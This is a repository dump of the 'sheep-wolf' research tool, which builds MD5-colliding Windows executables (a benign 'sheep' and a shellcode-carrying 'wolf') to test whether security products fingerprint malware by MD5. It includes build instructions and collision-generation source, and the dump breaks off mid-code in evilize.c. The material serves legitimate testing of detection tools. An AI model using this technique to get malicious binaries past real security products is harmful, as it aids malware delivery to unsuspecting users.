Repository: silentsignal/sheep-wolf Branch: master Commit: c4350480eea7 Files: 41 Total size: 158.7 KB Directory structure: gitextract_m5xybo6w/ ├── .gitignore ├── .gitmodules ├── README.md ├── evilize/ │ ├── AUTHORS │ ├── COPYING │ ├── ChangeLog │ ├── MBSD-LICENSE │ ├── Makefile │ ├── README │ ├── crib.h │ ├── evilize.c │ ├── md5.c │ ├── md5.h │ ├── md5coll.c │ ├── md5coll_lib.c │ └── md5coll_lib.h ├── fastcoll/ │ └── _PUT_FASTCOLL_HERE_ ├── msgbox.raw ├── results/ │ └── RESULTS.md ├── sheep/ │ ├── ReadMe.txt │ ├── common.h │ ├── crc.cpp │ ├── crc.h │ ├── rc4.cpp │ ├── rc4.h │ ├── sheep.cpp │ ├── sheep.vcxproj │ ├── sheep.vcxproj.filters │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── sheep.sln ├── shepherd/ │ ├── ReadMe.txt │ ├── shepherd.cpp │ ├── shepherd.vcxproj │ ├── shepherd.vcxproj.filters │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── shepherd.bat └── testing_methodology.dia ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ # Generated shellcode sheep/sc.h # Compiled Object files *.slo *.lo *.o *.obj # Precompiled Headers *.gch *.pch # Compiled Dynamic libraries *.so *.dylib *.dll # Fortran module files *.mod # Compiled Static libraries *.lai *.la *.a *.lib # Executables *.exe *.out *.app ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. # User-specific files *.suo *.user *.userosscache *.sln.docstates # User-specific files (MonoDevelop/Xamarin Studio) *.userprefs # Build results [Dd]ebug/ [Dd]ebugPublic/ [Rr]elease/ [Rr]eleases/ x64/ x86/ build/ bld/ [Bb]in/ [Oo]bj/ # Visual Studo 2015 cache/options directory .vs/ # MSTest test Results [Tt]est[Rr]esult*/ [Bb]uild[Ll]og.* # NUNIT *.VisualState.xml TestResult.xml # Build Results of an ATL Project [Dd]ebugPS/ [Rr]eleasePS/ dlldata.c # DNX project.lock.json artifacts/ *_i.c *_p.c *_i.h *.ilk *.meta *.obj *.pch *.pdb *.pgc *.pgd *.rsp *.sbr *.tlb *.tli *.tlh *.tmp *.tmp_proj *.log *.vspscc *.vssscc .builds *.pidb *.svclog *.scc # Chutzpah Test files _Chutzpah* # Visual C++ cache files ipch/ *.aps *.ncb *.opensdf *.sdf *.cachefile # Visual Studio profiler *.psess *.vsp *.vspx # TFS 2012 Local Workspace $tf/ # Guidance Automation Toolkit *.gpState # ReSharper is a .NET coding add-in _ReSharper*/ *.[Rr]e[Ss]harper *.DotSettings.user # JustCode is a .NET coding addin-in .JustCode # TeamCity is a build add-in _TeamCity* # DotCover is a Code Coverage Tool *.dotCover # NCrunch _NCrunch_* .*crunch*.local.xml # MightyMoose *.mm.* AutoTest.Net/ # Web workbench (sass) .sass-cache/ # Installshield output folder [Ee]xpress/ # DocProject is a documentation generator add-in DocProject/buildhelp/ DocProject/Help/*.HxT DocProject/Help/*.HxC DocProject/Help/*.hhc DocProject/Help/*.hhk DocProject/Help/*.hhp DocProject/Help/Html2 DocProject/Help/html # Click-Once directory publish/ # Publish Web Output *.[Pp]ublish.xml *.azurePubxml # TODO: Comment the next line if you want to checkin your web deploy settings # but database connection strings (with potential passwords) will be unencrypted *.pubxml *.publishproj # NuGet Packages *.nupkg # The packages folder can be ignored because of Package Restore **/packages/* # except build/, which is used as an MSBuild target. !**/packages/build/ # Uncomment if necessary however generally it will be regenerated when needed #!**/packages/repositories.config # Windows Azure Build Output csx/ *.build.csdef # Windows Store app package directory AppPackages/ # Visual Studio cache files # files ending in .cache can be ignored *.[Cc]ache # but keep track of directories ending in .cache !*.[Cc]ache/ # Others ClientBin/ [Ss]tyle[Cc]op.* ~$* *~ *.dbmdl *.dbproj.schemaview *.pfx *.publishsettings node_modules/ bower_components/ # RIA/Silverlight projects Generated_Code/ # Backup & report files from converting an old project file # to a newer Visual Studio version. Backup files are not needed, # because we have git ;-) _UpgradeReport_Files/ Backup*/ UpgradeLog*.XML UpgradeLog*.htm # SQL Server files *.mdf *.ldf # Business Intelligence projects *.rdl.data *.bim.layout *.bim_*.settings # Microsoft Fakes FakesAssemblies/ # Node.js Tools for Visual Studio .ntvs_analysis.dat # Visual Studio 6 build log *.plg # Visual Studio 6 workspace options file *.opt ================================================ FILE: .gitmodules ================================================ ================================================ FILE: README.md ================================================ Wolves Among the Sheep ====================== Some security tools still stick to MD5 when identifying malware samples years after practical collisions were shown against the algorithm. This can be [exploited](http://blog.silentsignal.eu/2015/06/10/poisonous-md5-wolves-among-the-sheep/) by first showing these tools a harmless sample (Sheep) and then a malicious one (Wolf) that have the same MD5 hash. Please use this code to test if the security products in your reach use MD5 internally to fingerprint binaries and share your results by issuing a pull request updating the contents of `results/`! Works-on-a-different-machine-than-mine version, feedback is welcome! Dependencies ------------ * 32-bit Windows (virtual) machine (64-bit breaks stuff) * Visual Studio 2012 to compile the projects (Express will do) * [Fastcoll](https://www.win.tue.nl/hashclash/) for collisions * Optional: Cygwin+MinGW to compile Evilize Usage ----- Extract Fastcoll to the `fastcoll` directory. Name the executable `fastcoll.exe` Use `shepherd.bat` to generate `wolf.exe` and `sheep.exe` (in the VS Development Command Prompt): ``` > shepherd.bat YOURPASSWORD your_shellcode.raw ``` After this step you should have your two colliding binaries (`sheep.exe` and `wolf.exe` in the `evilize` directory). For more information see the [tutorial of Peter Selinger](http://www.mathstat.dal.ca/~selinger/md5collision/), older revisions of this document or the source code... How does it work? ----------------- * `shepherd.bat` executes `shepherd.exe` with the user supplied command line arguments * `shepher.exe` generates a header file (`sc.h`) that contains the encrypted shellcode, the password and the CRC of the plain shellcode * `shepherd.bat` executes the build process of `sheep.exe` * `sheep.exe` is built with `sc.h`included by Visual Studio * `shepherd.bat` executes `evilize.exe` * `evilize.exe` calculates a special IV for the chunk of `sheep.exe` right before the block where the collision will happen * `evilize.exe` executes `fastcoll.exe` with the IV as a parameter * `fastcoll.exe` generates two 128 byte colliding blocks: `a` and `b` * `evilize.exe` replaces the original string buffers of `sheep.exe` so that they contain combinations `a` and `b` * The resulting files (`evilize/wolf.exe` and `evilize/sheep.exe` ) have the same MD5 hashes but behave differently. The real code to be executed only appears in the memory of `evilize/wolf.exe`. Testing Methodology ------------------- To test the security products in your reach you should generate two pairs of samples (SHEEP1-WOLF1 and SHEEP2-WOLF2), preferably with the same payload. Since samples (or their fingerprints) are usually uploaded to central repositories (or "the cloud") precompiled samples are not included to avoid conflicts between independent testers. After the samples are ready follow the methodology shown on the diagram below: ![Testing Methodology](testing_methodology.png "Testing Methodology") (\*) If the product is not able to detect the first malicious sample, there are more serious problems to worry about than crypto-fu. In fact, the simple cryptography included in the provided boilerplate code poses as a hard challenge for various products... Try to use more obvious samples! (\*\*) The product most probably uses some trivial method to detect the boilerplate insted of the actual payload. You can try to introduce simple changes to the code like removing debug strings. Please don't forget to share your positive results by issuing a pull request to the [RESULTS.md](https://github.com/silentsignal/sheep-wolf/blob/master/results/RESULTS.md) file! References ---------- * [Poisonous MD5 - Wolves Among the Sheep](http://blog.silentsignal.eu/2015/06/10/poisonous-md5-wolves-among-the-sheep/) * [Peter Selinger: MD5 Collision Demo](http://www.mathstat.dal.ca/~selinger/md5collision/) * [How to make two binaries with same MD5](http://natmchugh.blogspot.co.uk/2015/05/how-to-make-two-binaries-with-same-md5.html) * [Stop using MD5 now!](http://jumpespjump.blogspot.hu/2014/03/stop-using-md-5-now.html) LICENSE ------- Licenced under GNU/GPL if not otherwise stated. ================================================ FILE: evilize/AUTHORS ================================================ Known contributors are listed here, in alphabetical order by their abbreviations (which are used in Changelog). PS1 Peter Selinger (author) VPB1 Balint Varga-Perke (contributor) ================================================ FILE: evilize/COPYING ================================================ GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Library General Public License instead of this License. ================================================ FILE: evilize/ChangeLog ================================================ ChangeLog v0.2p 2015/06/06 (2015/06/06) VPB1 - Stripped down version to demonstate MD5 Poisoning v0.2 2011/10/11 (2011/10/11) PS1 - fixed compiler over-optimization bug ("no crib found"). Reported by Borja Burgos. v0.1 2006/02/18 Initial public release ================================================ FILE: evilize/MBSD-LICENSE ================================================ Modified BSD License Copyright (C) 2005 Patrick Stach Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ================================================ FILE: evilize/Makefile ================================================ # Copyright (C) 2006 Peter Selinger. This file is distributed under # the terms of the GNU General Public License. See the file COPYING # for details. CC=i686-pc-mingw32-gcc CFLAGS=-O3 -Wall -DSTDC_HEADERS -g -DMD5COLL_VERSION=\"${MD5COLL_VERSION}\" -DVERSION=\"${VERSION}\" PACKAGE=evilize VERSION=0.2p MD5COLL_VERSION=0.1s TOOLS=evilize md5coll tools: ${TOOLS} examples: ${EXAMPLES} evilize: evilize.o md5.o md5coll_lib.o md5coll: md5coll.o md5coll_lib.o # ---------------------------------------------------------------------- # Distribution DISTFILES=evilize.c md5coll.c md5coll_lib.c md5coll_lib.h crib.h md5.h \ md5.c Makefile COPYING MBSD-LICENSE README ChangeLog AUTHORS dist: ${DISTFILES} rm -rf ${PACKAGE}-${VERSION} mkdir ${PACKAGE}-${VERSION} cp ${DISTFILES} ${PACKAGE}-${VERSION} tar zcf ${PACKAGE}-${VERSION}.tar.gz ${PACKAGE}-${VERSION} #---------------------------------------------------------------------- clean: rm -f *.o cleanall: clean rm -f ${TOOLS} #---------------------------------------------------------------------- # The following dependencies were generated with # makedepend -DHAVE_CONFIG_H -I.. -f- -Y *.c # DO NOT DELETE evilize.o: md5.h md5coll_lib.h crib.h md5.o: md5.h md5coll.o: md5coll_lib.h md5coll_lib.o: md5coll_lib.h ================================================ FILE: evilize/README ================================================ Evilize: create pairs of executable files with the same MD5 hash ---------------------------------------------------------------- Copyright (C) 2006 Peter Selinger. This file is distributed under the terms of the GNU General Public License. See the file COPYING for details. Quick Instructions. ------------------- Note for Windows users: the below instructions are for Unix/Linux. On Windows, you may have to append ".exe" to the names of executable files. Also, to use "make", you must have the GNU tools installed and working. 1. Unpack the archive and build the library and tools: tar zxf evilize-0.1.tar.gz cd evilize-0.1 make This creates the programs "evilize", "md5coll", and the object file "goodevil.o". 2. Create a C program with multiple behaviors. Instead of the usual top-level function main(), write two separate top-level functions main_good() and main_evil(). See the file hello-erase.c for a simple example. 3. Compile your program and link against goodevil.o. For example: gcc hello-erase.c goodevil.o -o hello-erase 4. Run the following command to create an initialization vector: ./evilize hello-erase -i 5. Create an MD5 collision by running the following command (but replace the vector on the command line with the one you found in step 4): ./md5coll 0x23d3e487 0x3e3ea619 0xc7bdd6fa 0x2d0271e7 > init.txt Note: this step can take several hours. 6. Create a pair of good and evil programs by running: ./evilize hello-erase -c init.txt -g good -e evil Here "good" and "evil" are the names of the two programs generated, and "hello-erase" is the name of the program you created in step 3. NOTE: steps 4-6 can also be done in a single step, as follows: ./evilize hello-erase -g good -e evil However, I prefer to do the steps separately, since step 5 takes so long. 7. Check the MD5 checksums of the files "good" and "evil"; they should be the same. 8. Run the programs "good" and "evil" - they should exhibit the two different behaviors that you programmed in step 2. How does it work? ----------------- For an explanation, see http://www.mathstat.dal.ca/~selinger/md5collision/ Credits. -------- The md5coll tool was written by Patrick Stach , based on a paper by Xiaoyun Wang et al. The version distributed with this file was modified by Peter Selinger. It is distributed under a Modified BSD License, see MBSD-LICENSE for details. The evilize tool was written by Peter Selinger, and uses third-party code by Patrick Stach and others. It is distributed under the GNU General Public License, see the file COPYING for details. ================================================ FILE: evilize/crib.h ================================================ /* Copyright (C) 2006 Peter Selinger. This file is distributed under the terms of the GNU General Public License. See the file COPYING for details. */ /* This byte sequence is used as a placeholder in the compiled program. Any sufficiently random 191-character string will do */ #define CRIB "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ ================================================ FILE: evilize/evilize.c ================================================ /* Copyright (C) 2006 Peter Selinger. This file is distributed under the terms of the GNU General Public License. See the file COPYING for details. */ /* evilize.c: a program to create pairs of files with identical MD5 hash, from a template. The template must contain two copies of a "crib" string defined in crib.h. The crib strings will be replaced, in two different ways, to create a "good" and an "evil" version of the file. In the "good" version, the two crib strings are replaced by the same data, in the "evil" version, they are replaced by different data. This is done in such a way that the "good" and "evil" files have the same MD5 hash. */ #include #include #include #include #include #include #include #include #include #include "md5.h" #include "md5coll_lib.h" #include "crib.h" #define NAME "evilize" static char *crib = CRIB; #define LBUFSIZE 1024 #define FASTCOLL_CMD "..\\\\fastcoll\\\\fastcoll.exe -i %08x%08x%08x%08x -o a b" int find_crib(FILE *fin){ char buf[64]; char last_buf[64]; int r; int i; while (1) { r = fread(buf, 1, 64, fin); if (r < 64) { return 1; } for (i=0; i<64; i+=8) { if (memcmp(buf+i, crib, 64-i) == 0) { return ftell(fin)-64+i; } } memcpy(last_buf,buf,64); } } /* find the initial vector required to evilize FILE, return it in IV. Returns 1 if crib was not found. */ static int find_iv(FILE *fin, unsigned int IV[4]) { struct md5_ctx ctx; char buf[64]; int r; int i; md5_init_ctx(&ctx); while (1) { r = fread(buf, 1, 64, fin); if (r < 64) { return 1; } for (i=0; i<64; i++) { if (memcmp(buf, crib+i, 64) == 0) { goto crib_found; } } md5_process_block(buf, 64, &ctx); } crib_found: /* find md5 collision for the given ctx initial value */ IV[0] = ctx.A; IV[1] = ctx.B; IV[2] = ctx.C; IV[3] = ctx.D; return ftell(fin); } /* print usage information */ static void usage(FILE *fout) { fprintf(fout, "%s %s. Create a pair of files with the same MD5 hash, from a template.\n", NAME, VERSION); fprintf(fout, "Templates are generated by linking against goodevil.o.\n"); fprintf(fout, "\n"); fprintf(fout, "Usage: %s [options] infile\n", NAME); fprintf(fout, "Options:\n" " -h, --help print this help message and exit\n" " -V, --version print version info and exit\n" " -L, --license print license info and exit\n" " -- end of options, filename follows\n"); } /* print version and copyright information */ static void version(FILE *fout) { fprintf(fout, "%s %s. Create a pair of files with the same MD5 hash, from a template.\n", NAME, VERSION); fprintf(fout, "Copyright (C) 2006 Peter Selinger.\n"); fprintf(fout, "Collision generator: Copyright (C) 2005 Patrick Stach .\n"); fprintf(fout, "Implementation of paper by Xiaoyun Wang, et al.\n"); } static void license(FILE *fout) { fprintf(fout, "%s %s. Create a pair of files with the same MD5 hash, from a template.\n", NAME, VERSION); fprintf(fout, "Copyright (C) 2006 Peter Selinger.\n"); fprintf(fout, "Collision generator: Copyright (C) 2005 Patrick Stach .\n"); fprintf(fout, "Implementation of paper by Xiaoyun Wang, et al.\n"); fprintf(fout, "\n"); fprintf(fout, "This program is free software; you can redistribute it and/or modify\n" "it under the terms of the GNU General Public License as published by\n" "the Free Software Foundation; either version 2 of the License, or\n" "(at your option) any later version.\n" "\n" "This program is distributed in the hope that it will be useful,\n" "but WITHOUT ANY WARRANTY; without even the implied warranty of\n" "MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n" "GNU General Public License for more details.\n" "\n" "You should have received a copy of the GNU General Public License\n" "along with this program; if not, write to the Free Software\n" "Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n" "\n" "Some parts of this code are distributed under a Modified BSD License;\n" "see the source code and the file MBSD-LICENSE for details.\n" ); } static struct option longopts[] = { {"help", 0, 0, 'h'}, {"version", 0, 0, 'V'}, {"license", 0, 0, 'L'}, {"iv", 0, 0, 'i'}, {0, 0, 0, 0} }; static char *shortopts = "hVLi"; uint32_t swap_uint32( uint32_t val ) { val = ((val << 8) & 0xFF00FF00 ) | ((val >> 8) & 0xFF00FF ); return (val << 16) | (val >> 16); } int main(int ac, char *av[]) { int r; unsigned int IV[4]; int c; int count; FILE *fin; FILE *fa; FILE *fb; FILE *fsheep; FILE *fwolf; int pos; int off; int i=0; unsigned char a[128]; unsigned char b[128]; unsigned char copybuf[192]; unsigned char ch; unsigned char ch_wolf,ch_sheep; char *cmd; /* command line options */ char *infile = NULL; while ((c = getopt_long(ac, av, shortopts, longopts, NULL)) != -1) { switch (c) { case 'h': usage(stdout); exit(0); break; case 'V': version(stdout); exit(0); break; case 'L': license(stdout); exit(0); break; case '?': fprintf(stderr, "Try --help for more information.\n"); exit(1); break; } } count = ac-optind; if (count < 1) { fprintf(stderr, "No filename given. Try --help for more information.\n"); exit(1); } else if (count > 1) { fprintf(stderr, "Too many filenames given. Try --help for more information.\n"); exit(1); } infile = av[optind]; fin = fopen(infile, "rb"); if (!fin) { fprintf(stderr, "%s: %s: %s\n", NAME, infile, strerror(errno)); exit(1); } r = find_iv(fin, IV); rewind(fin); pos=find_crib(fin); off=r-pos-64; printf("CRIB START: %d\n",pos); fclose(fin); if (pos == -1 || r == 1) { fprintf(stderr, "%s: %s: no crib found.\n", NAME, infile); exit(1); } fprintf(stdout, "%08x%08x%08x%08x\n", swap_uint32(IV[0]), swap_uint32(IV[1]), swap_uint32(IV[2]), swap_uint32(IV[3])); cmd=(char*)malloc(strlen(FASTCOLL_CMD)+16+1); sprintf(cmd,FASTCOLL_CMD,swap_uint32(IV[0]), swap_uint32(IV[1]), swap_uint32(IV[2]), swap_uint32(IV[3])); printf("%s\n",cmd); system(cmd); fa=fopen("a","rb"); fb=fopen("b","rb"); fread(a,128,1,fa); fread(b,128,1,fb); fclose(fa); fclose(fb); fin = fopen(infile, "rb"); fsheep = fopen("sheep.exe","wb"); fwolf = fopen("wolf.exe","wb"); printf("Copybuf start: %d end: %d \n",pos-16,pos+176); while(!feof(fin)){ ch=fgetc(fin); //printf("Difference start: %d end: %d \n",pos+16,pos+128+16); if 